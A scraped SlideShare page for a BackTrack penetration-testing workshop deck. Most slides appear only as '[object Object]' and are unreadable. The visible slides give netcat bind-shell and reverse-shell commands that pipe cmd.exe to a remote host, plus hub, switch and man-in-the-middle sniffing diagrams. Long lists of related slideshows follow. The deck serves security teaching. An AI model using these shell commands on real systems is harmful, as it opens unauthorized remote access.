SlideShare une entreprise Scribd logo

Workshop on BackTrack live CD

A
amiable_indian

BackTrack is a Linux distribution focused on penetration testing with over 300 security tools. It allows testing of vulnerabilities like buffer overflows and cross-site scripting through tools like Nmap, Nikto, and Metasploit. Attackers can use these tools along with techniques like ARP poisoning to conduct remote exploits or hack passwords on Windows systems.

Technologie
1  sur  25
Introduction to BackTrack Local boot to remote root in just one CD Thought for the day, “Don’t learn to hack, hack to learn”..!!! - darknet.org.uk Kunal Sehgal [email_address]
[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object]
Attacker (Private IP) Victim (Public IP) NAT Internet Bind Shell: nc -lvp 4444 -e cmd.exe nc -v <IP> 4444 Internet Attacker Connects to Victim (Incoming Traffic)
Attacker (Public IP) Victim (Private IP) Internet Reverse Shell: nc -v <IP> 4444 -e cmd.exe nc -lvp 4444 Internet NAT Victim sends the shell (Outgoing Traffic)
[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object]
Attacker Sender Receiver Network Using A Hub Can easily sniff data
Attacker Sender Receiver Network Using A Switch Cannot sniff any data :(
Attacker Sender Receiver Man In The Middle Attack Hi everyone, I’m the switch
[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],Vulnerability ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Payload
[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object]
[object Object]

Recommandé

Testbed For Ids
Testbed For IdsTestbed For Ids
Testbed For Ids
amiable_indian
 
Digital Immunity -The Myths and Reality
Digital Immunity -The Myths and RealityDigital Immunity -The Myths and Reality
Digital Immunity -The Myths and Reality
amiable_indian
 
Pentesting with Metasploit
Pentesting with MetasploitPentesting with Metasploit
Pentesting with Metasploit
Prakashchand Suthar
 
Network security and protocols
Network security and protocolsNetwork security and protocols
Network security and protocols
Online
 
Ethical hacking Chapter 12 - Encryption - Eric Vanderburg
Ethical hacking Chapter 12 - Encryption - Eric VanderburgEthical hacking Chapter 12 - Encryption - Eric Vanderburg
Ethical hacking Chapter 12 - Encryption - Eric Vanderburg
Eric Vanderburg
 
Paper1
Paper1Paper1
Paper1
SpacSec
 
Network Attacks and Countermeasures
Network Attacks and CountermeasuresNetwork Attacks and Countermeasures
Network Attacks and Countermeasures
karanwayne
 
Computer Security - CCNA Security - Lecture 1
Computer Security - CCNA Security - Lecture 1Computer Security - CCNA Security - Lecture 1
Computer Security - CCNA Security - Lecture 1
Mohamed Loey
 

Recommandé

Testbed For Ids
Testbed For IdsTestbed For Ids
Testbed For Ids
amiable_indian
 
Digital Immunity -The Myths and Reality
Digital Immunity -The Myths and RealityDigital Immunity -The Myths and Reality
Digital Immunity -The Myths and Reality
amiable_indian
 
Pentesting with Metasploit
Pentesting with MetasploitPentesting with Metasploit
Pentesting with Metasploit
Prakashchand Suthar
 
Network security and protocols
Network security and protocolsNetwork security and protocols
Network security and protocols
Online
 
Ethical hacking Chapter 12 - Encryption - Eric Vanderburg
Ethical hacking Chapter 12 - Encryption - Eric VanderburgEthical hacking Chapter 12 - Encryption - Eric Vanderburg
Ethical hacking Chapter 12 - Encryption - Eric Vanderburg
Eric Vanderburg
 
Paper1
Paper1Paper1
Paper1
SpacSec
 
Network Attacks and Countermeasures
Network Attacks and CountermeasuresNetwork Attacks and Countermeasures
Network Attacks and Countermeasures
karanwayne
 
Computer Security - CCNA Security - Lecture 1
Computer Security - CCNA Security - Lecture 1Computer Security - CCNA Security - Lecture 1
Computer Security - CCNA Security - Lecture 1
Mohamed Loey
 
On-Analyzing-a-Layered-Defense-System
On-Analyzing-a-Layered-Defense-SystemOn-Analyzing-a-Layered-Defense-System
On-Analyzing-a-Layered-Defense-System
Sarah Rudd
 
edu03firewall,Antivirus software.pptx
edu03firewall,Antivirus software.pptxedu03firewall,Antivirus software.pptx
edu03firewall,Antivirus software.pptx
ANJUMOHANANU
 
Ch06 Wireless Network Security
Ch06 Wireless Network SecurityCh06 Wireless Network Security
Ch06 Wireless Network Security
Information Technology
 
Network and security concepts
Network and security conceptsNetwork and security concepts
Network and security concepts
sonuagain
 
Edu 03Anju 23 assignment.pdf
Edu 03Anju 23 assignment.pdfEdu 03Anju 23 assignment.pdf
Edu 03Anju 23 assignment.pdf
ANJUMOHANANU
 
mcq edu03 Anju 23.pdf
mcq edu03 Anju 23.pdfmcq edu03 Anju 23.pdf
mcq edu03 Anju 23.pdf
ANJUMOHANANU
 
Detection and localization of multiple spoofing attacks in
Detection and localization of multiple spoofing attacks inDetection and localization of multiple spoofing attacks in
Detection and localization of multiple spoofing attacks in
Finalyear Projects
 
Honeypots - Tracking the Blackhat Community
Honeypots - Tracking the Blackhat CommunityHoneypots - Tracking the Blackhat Community
Honeypots - Tracking the Blackhat Community
amiable_indian
 
Ph d proposal_20070809
Ph d proposal_20070809Ph d proposal_20070809
Ph d proposal_20070809
Todd Deshane
 
Ethical hacking Chapter 3 - Network and Computer Attacks - Eric Vanderburg
Ethical hacking Chapter 3 - Network and Computer Attacks - Eric VanderburgEthical hacking Chapter 3 - Network and Computer Attacks - Eric Vanderburg
Ethical hacking Chapter 3 - Network and Computer Attacks - Eric Vanderburg
Eric Vanderburg
 
Network Security
Network SecurityNetwork Security
Network Security
Jaya sudha
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Nezar Alazzabi
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for public
Julia Yu-Chin Cheng
 
MID_Complex_Network_Security_Alex_de_Graaf_EN
MID_Complex_Network_Security_Alex_de_Graaf_ENMID_Complex_Network_Security_Alex_de_Graaf_EN
MID_Complex_Network_Security_Alex_de_Graaf_EN
Vladyslav Radetsky
 
Firewall
FirewallFirewall
Firewall
Ahmed Elnaggar
 
Ethical hacking Chapter 1 - Overview - Eric Vanderburg
Ethical hacking Chapter 1 - Overview - Eric VanderburgEthical hacking Chapter 1 - Overview - Eric Vanderburg
Ethical hacking Chapter 1 - Overview - Eric Vanderburg
Eric Vanderburg
 
CEH and Security+ Training Outline - EH Academy
CEH and Security+ Training Outline - EH AcademyCEH and Security+ Training Outline - EH Academy
CEH and Security+ Training Outline - EH Academy
E Hacking
 
What you need to know about ExPetr ransomware
What you need to know about ExPetr ransomwareWhat you need to know about ExPetr ransomware
What you need to know about ExPetr ransomware
Kaspersky
 
Security Onion
Security OnionSecurity Onion
Security Onion
n|u - The Open Security Community
 
Windows network
Windows networkWindows network
Windows network
Jithesh Nair
 
Smart City Lauaxeta
Smart City LauaxetaSmart City Lauaxeta
Smart City Lauaxeta
xabid
 
The light of day Graham Swift
The light of day Graham SwiftThe light of day Graham Swift
The light of day Graham Swift
Ivana Štípalová
 

Contenu connexe

Tendances

On-Analyzing-a-Layered-Defense-System
On-Analyzing-a-Layered-Defense-SystemOn-Analyzing-a-Layered-Defense-System
On-Analyzing-a-Layered-Defense-System
Sarah Rudd
 
Ch06 Wireless Network Security
Ch06 Wireless Network SecurityCh06 Wireless Network Security
Ch06 Wireless Network Security
Information Technology
 
Ph d proposal_20070809
Ph d proposal_20070809Ph d proposal_20070809
Ph d proposal_20070809
Todd Deshane
 
Network Security
Network SecurityNetwork Security
Network Security
Jaya sudha
 
CEH and Security+ Training Outline - EH Academy
CEH and Security+ Training Outline - EH AcademyCEH and Security+ Training Outline - EH Academy
CEH and Security+ Training Outline - EH Academy
E Hacking
 
What you need to know about ExPetr ransomware
What you need to know about ExPetr ransomwareWhat you need to know about ExPetr ransomware
What you need to know about ExPetr ransomware
Kaspersky
 

Tendances (20)

On-Analyzing-a-Layered-Defense-System
On-Analyzing-a-Layered-Defense-SystemOn-Analyzing-a-Layered-Defense-System
On-Analyzing-a-Layered-Defense-System
 
edu03firewall,Antivirus software.pptx
edu03firewall,Antivirus software.pptxedu03firewall,Antivirus software.pptx
edu03firewall,Antivirus software.pptx
 
Ch06 Wireless Network Security
Ch06 Wireless Network SecurityCh06 Wireless Network Security
Ch06 Wireless Network Security
 
Network and security concepts
Network and security conceptsNetwork and security concepts
Network and security concepts
 
Edu 03Anju 23 assignment.pdf
Edu 03Anju 23 assignment.pdfEdu 03Anju 23 assignment.pdf
Edu 03Anju 23 assignment.pdf
 
mcq edu03 Anju 23.pdf
mcq edu03 Anju 23.pdfmcq edu03 Anju 23.pdf
mcq edu03 Anju 23.pdf
 
Detection and localization of multiple spoofing attacks in
Detection and localization of multiple spoofing attacks inDetection and localization of multiple spoofing attacks in
Detection and localization of multiple spoofing attacks in
 
Honeypots - Tracking the Blackhat Community
Honeypots - Tracking the Blackhat CommunityHoneypots - Tracking the Blackhat Community
Honeypots - Tracking the Blackhat Community
 
Ph d proposal_20070809
Ph d proposal_20070809Ph d proposal_20070809
Ph d proposal_20070809
 
Ethical hacking Chapter 3 - Network and Computer Attacks - Eric Vanderburg
Ethical hacking Chapter 3 - Network and Computer Attacks - Eric VanderburgEthical hacking Chapter 3 - Network and Computer Attacks - Eric Vanderburg
Ethical hacking Chapter 3 - Network and Computer Attacks - Eric Vanderburg
 
Network Security
Network SecurityNetwork Security
Network Security
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for public
 
MID_Complex_Network_Security_Alex_de_Graaf_EN
MID_Complex_Network_Security_Alex_de_Graaf_ENMID_Complex_Network_Security_Alex_de_Graaf_EN
MID_Complex_Network_Security_Alex_de_Graaf_EN
 
Firewall
FirewallFirewall
Firewall
 
Ethical hacking Chapter 1 - Overview - Eric Vanderburg
Ethical hacking Chapter 1 - Overview - Eric VanderburgEthical hacking Chapter 1 - Overview - Eric Vanderburg
Ethical hacking Chapter 1 - Overview - Eric Vanderburg
 
CEH and Security+ Training Outline - EH Academy
CEH and Security+ Training Outline - EH AcademyCEH and Security+ Training Outline - EH Academy
CEH and Security+ Training Outline - EH Academy
 
What you need to know about ExPetr ransomware
What you need to know about ExPetr ransomwareWhat you need to know about ExPetr ransomware
What you need to know about ExPetr ransomware
 
Security Onion
Security OnionSecurity Onion
Security Onion
 
Windows network
Windows networkWindows network
Windows network
 

En vedette

TALLERES DE FORMACIÓN MAESTROS (AS) ONDAS CAUCA
TALLERES DE FORMACIÓN MAESTROS (AS) ONDAS CAUCATALLERES DE FORMACIÓN MAESTROS (AS) ONDAS CAUCA
TALLERES DE FORMACIÓN MAESTROS (AS) ONDAS CAUCA
Ondas Cauca
 
Economic Development Experts Nov-2015
Economic Development Experts Nov-2015Economic Development Experts Nov-2015
Economic Development Experts Nov-2015
Rostyslav LUKACH
 
Hacking By Nirmal
Hacking By NirmalHacking By Nirmal
Hacking By Nirmal
NIRMAL RAJ
 
Daylight _architecture_magazine_-_2007_autumn
Daylight _architecture_magazine_-_2007_autumnDaylight _architecture_magazine_-_2007_autumn
Daylight _architecture_magazine_-_2007_autumn
GABRIELA Narvaez
 

En vedette (20)

Smart City Lauaxeta
Smart City LauaxetaSmart City Lauaxeta
Smart City Lauaxeta
 
The light of day Graham Swift
The light of day Graham SwiftThe light of day Graham Swift
The light of day Graham Swift
 
Daylight Driver Index™ (DDI) Slidedeck
Daylight Driver Index™ (DDI) SlidedeckDaylight Driver Index™ (DDI) Slidedeck
Daylight Driver Index™ (DDI) Slidedeck
 
Helieon™ Sustainable Light Module
Helieon™ Sustainable Light ModuleHelieon™ Sustainable Light Module
Helieon™ Sustainable Light Module
 
Presentation11
Presentation11Presentation11
Presentation11
 
TORQUE CERTIFICATES
TORQUE CERTIFICATESTORQUE CERTIFICATES
TORQUE CERTIFICATES
 
TALLERES DE FORMACIÓN MAESTROS (AS) ONDAS CAUCA
TALLERES DE FORMACIÓN MAESTROS (AS) ONDAS CAUCATALLERES DE FORMACIÓN MAESTROS (AS) ONDAS CAUCA
TALLERES DE FORMACIÓN MAESTROS (AS) ONDAS CAUCA
 
Nhan mac 20 apsara
Nhan mac 20 apsaraNhan mac 20 apsara
Nhan mac 20 apsara
 
Economic Development Experts Nov-2015
Economic Development Experts Nov-2015Economic Development Experts Nov-2015
Economic Development Experts Nov-2015
 
Bottom App - Applicate Final
Bottom App - Applicate FinalBottom App - Applicate Final
Bottom App - Applicate Final
 
Acentuación española
Acentuación españolaAcentuación española
Acentuación española
 
Amazing myanmar handicrafts
Amazing myanmar handicraftsAmazing myanmar handicrafts
Amazing myanmar handicrafts
 
386
386386
386
 
Transicion darly naranjo
Transicion darly naranjoTransicion darly naranjo
Transicion darly naranjo
 
Costume research
Costume researchCostume research
Costume research
 
Desierto
DesiertoDesierto
Desierto
 
Hacking By Nirmal
Hacking By NirmalHacking By Nirmal
Hacking By Nirmal
 
Daylight _architecture_magazine_-_2007_autumn
Daylight _architecture_magazine_-_2007_autumnDaylight _architecture_magazine_-_2007_autumn
Daylight _architecture_magazine_-_2007_autumn
 
Passive architecture
Passive architecturePassive architecture
Passive architecture
 
Vías de administración
Vías de administraciónVías de administración
Vías de administración
 

Similaire à Workshop on BackTrack live CD

Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
EC-Council
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Shakacon
 
Portakal Teknoloji Otc Lyon Part 1
Portakal Teknoloji Otc Lyon Part 1Portakal Teknoloji Otc Lyon Part 1
Portakal Teknoloji Otc Lyon Part 1
bora.gungoren
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
Karen Oliver
 
Presentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad AlmajaliPresentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad Almajali
webhostingguy
 
Network Vulnerability Assessments: Lessons Learned
Network Vulnerability Assessments: Lessons LearnedNetwork Vulnerability Assessments: Lessons Learned
Network Vulnerability Assessments: Lessons Learned
amiable_indian
 
Chris - Network Vulnerability Assessments: Lessons Learned - ClubHack2008
Chris - Network Vulnerability Assessments: Lessons Learned - ClubHack2008Chris - Network Vulnerability Assessments: Lessons Learned - ClubHack2008
Chris - Network Vulnerability Assessments: Lessons Learned - ClubHack2008
ClubHack
 
Hacking tutorial
Hacking tutorialHacking tutorial
Hacking tutorial
MSA Technosoft
 

Similaire à Workshop on BackTrack live CD (20)

Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Final project.ppt
Final project.pptFinal project.ppt
Final project.ppt
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
Portakal Teknoloji Otc Lyon Part 1
Portakal Teknoloji Otc Lyon Part 1Portakal Teknoloji Otc Lyon Part 1
Portakal Teknoloji Otc Lyon Part 1
 
Hacking
HackingHacking
Hacking
 
Hacking
HackingHacking
Hacking
 
RAZORPOINT SECURITY GLOSSARY
RAZORPOINT SECURITY GLOSSARYRAZORPOINT SECURITY GLOSSARY
RAZORPOINT SECURITY GLOSSARY
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?
 
Hacking and its Defence
Hacking and its DefenceHacking and its Defence
Hacking and its Defence
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
 
Module 5 (system hacking)
Module 5 (system hacking)Module 5 (system hacking)
Module 5 (system hacking)
 
Backdoor Entry to a Windows Computer
Backdoor Entry to a Windows ComputerBackdoor Entry to a Windows Computer
Backdoor Entry to a Windows Computer
 
Hacking In Detail
Hacking In DetailHacking In Detail
Hacking In Detail
 
Presentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad AlmajaliPresentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad Almajali
 
Network Vulnerability Assessments: Lessons Learned
Network Vulnerability Assessments: Lessons LearnedNetwork Vulnerability Assessments: Lessons Learned
Network Vulnerability Assessments: Lessons Learned
 
Chris - Network Vulnerability Assessments: Lessons Learned - ClubHack2008
Chris - Network Vulnerability Assessments: Lessons Learned - ClubHack2008Chris - Network Vulnerability Assessments: Lessons Learned - ClubHack2008
Chris - Network Vulnerability Assessments: Lessons Learned - ClubHack2008
 
Catch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your networkCatch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your network
 
Hacking tutorial
Hacking tutorialHacking tutorial
Hacking tutorial
 

Plus de amiable_indian

Phishing As Tragedy of the Commons
Phishing As Tragedy of the CommonsPhishing As Tragedy of the Commons
Phishing As Tragedy of the Commons
amiable_indian
 
Cisco IOS Attack & Defense - The State of the Art
Cisco IOS Attack & Defense - The State of the Art Cisco IOS Attack & Defense - The State of the Art
Cisco IOS Attack & Defense - The State of the Art
amiable_indian
 
Secrets of Top Pentesters
Secrets of Top PentestersSecrets of Top Pentesters
Secrets of Top Pentesters
amiable_indian
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Security
amiable_indian
 
Insecure Implementation of Security Best Practices: of hashing, CAPTCHA's and...
Insecure Implementation of Security Best Practices: of hashing, CAPTCHA's and...Insecure Implementation of Security Best Practices: of hashing, CAPTCHA's and...
Insecure Implementation of Security Best Practices: of hashing, CAPTCHA's and...
amiable_indian
 
Reverse Engineering for exploit writers
Reverse Engineering for exploit writersReverse Engineering for exploit writers
Reverse Engineering for exploit writers
amiable_indian
 
State of Cyber Law in India
State of Cyber Law in IndiaState of Cyber Law in India
State of Cyber Law in India
amiable_indian
 
AntiSpam - Understanding the good, the bad and the ugly
AntiSpam - Understanding the good, the bad and the uglyAntiSpam - Understanding the good, the bad and the ugly
AntiSpam - Understanding the good, the bad and the ugly
amiable_indian
 
Reverse Engineering v/s Secure Coding
Reverse Engineering v/s Secure CodingReverse Engineering v/s Secure Coding
Reverse Engineering v/s Secure Coding
amiable_indian
 
Economic offenses through Credit Card Frauds Dissected
Economic offenses through Credit Card Frauds DissectedEconomic offenses through Credit Card Frauds Dissected
Economic offenses through Credit Card Frauds Dissected
amiable_indian
 
Immune IT: Moving from Security to Immunity
Immune IT: Moving from Security to ImmunityImmune IT: Moving from Security to Immunity
Immune IT: Moving from Security to Immunity
amiable_indian
 
Reverse Engineering for exploit writers
Reverse Engineering for exploit writersReverse Engineering for exploit writers
Reverse Engineering for exploit writers
amiable_indian
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
amiable_indian
 
Web Exploit Finder Presentation
Web Exploit Finder PresentationWeb Exploit Finder Presentation
Web Exploit Finder Presentation
amiable_indian
 

Plus de amiable_indian (20)

Phishing As Tragedy of the Commons
Phishing As Tragedy of the CommonsPhishing As Tragedy of the Commons
Phishing As Tragedy of the Commons
 
Cisco IOS Attack & Defense - The State of the Art
Cisco IOS Attack & Defense - The State of the Art Cisco IOS Attack & Defense - The State of the Art
Cisco IOS Attack & Defense - The State of the Art
 
Secrets of Top Pentesters
Secrets of Top PentestersSecrets of Top Pentesters
Secrets of Top Pentesters
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Security
 
Insecure Implementation of Security Best Practices: of hashing, CAPTCHA's and...
Insecure Implementation of Security Best Practices: of hashing, CAPTCHA's and...Insecure Implementation of Security Best Practices: of hashing, CAPTCHA's and...
Insecure Implementation of Security Best Practices: of hashing, CAPTCHA's and...
 
Reverse Engineering for exploit writers
Reverse Engineering for exploit writersReverse Engineering for exploit writers
Reverse Engineering for exploit writers
 
State of Cyber Law in India
State of Cyber Law in IndiaState of Cyber Law in India
State of Cyber Law in India
 
AntiSpam - Understanding the good, the bad and the ugly
AntiSpam - Understanding the good, the bad and the uglyAntiSpam - Understanding the good, the bad and the ugly
AntiSpam - Understanding the good, the bad and the ugly
 
Reverse Engineering v/s Secure Coding
Reverse Engineering v/s Secure CodingReverse Engineering v/s Secure Coding
Reverse Engineering v/s Secure Coding
 
Economic offenses through Credit Card Frauds Dissected
Economic offenses through Credit Card Frauds DissectedEconomic offenses through Credit Card Frauds Dissected
Economic offenses through Credit Card Frauds Dissected
 
Immune IT: Moving from Security to Immunity
Immune IT: Moving from Security to ImmunityImmune IT: Moving from Security to Immunity
Immune IT: Moving from Security to Immunity
 
Reverse Engineering for exploit writers
Reverse Engineering for exploit writersReverse Engineering for exploit writers
Reverse Engineering for exploit writers
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Web Exploit Finder Presentation
Web Exploit Finder PresentationWeb Exploit Finder Presentation
Web Exploit Finder Presentation
 
Network Security Data Visualization
Network Security Data VisualizationNetwork Security Data Visualization
Network Security Data Visualization
 
Enhancing Computer Security via End-to-End Communication Visualization
Enhancing Computer Security via End-to-End Communication Visualization Enhancing Computer Security via End-to-End Communication Visualization
Enhancing Computer Security via End-to-End Communication Visualization
 
Top Network Vulnerabilities Over Time
Top Network Vulnerabilities Over TimeTop Network Vulnerabilities Over Time
Top Network Vulnerabilities Over Time
 
What are the Business Security Metrics?
What are the Business Security Metrics? What are the Business Security Metrics?
What are the Business Security Metrics?
 
No Substitute for Ongoing Data, Quantification, Visualization, and Story-Telling
No Substitute for Ongoing Data, Quantification, Visualization, and Story-TellingNo Substitute for Ongoing Data, Quantification, Visualization, and Story-Telling
No Substitute for Ongoing Data, Quantification, Visualization, and Story-Telling
 
Advanced Ajax Security
Advanced Ajax SecurityAdvanced Ajax Security
Advanced Ajax Security
 

Dernier

Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Orbitshub
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
UiPathCommunity
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Victor Rentea
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Orbitshub
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 

Dernier (20)

Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
